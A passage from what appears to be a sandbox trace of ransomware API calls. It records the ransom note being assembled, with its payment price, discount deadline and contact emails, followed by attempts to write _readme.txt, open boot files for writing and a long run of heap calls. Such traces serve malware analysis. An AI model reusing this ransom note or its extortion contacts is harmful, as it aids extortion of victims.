files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0166.025] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0166.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0166.025] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\_readme.txt" (normalized: "c:\\boot\\pl-pl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.025] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0166.025] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0166.025] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0166.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44e88 [0166.026] PathFindExtensionW (pszPath="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned=".mui" [0166.026] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e88 | out: hHeap=0xcd0000) returned 1 [0166.026] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0166.026] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0166.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0166.026] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0166.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0166.026] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0166.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0166.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0166.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.031] HeapFree (in: hHeap=0xcd0000, 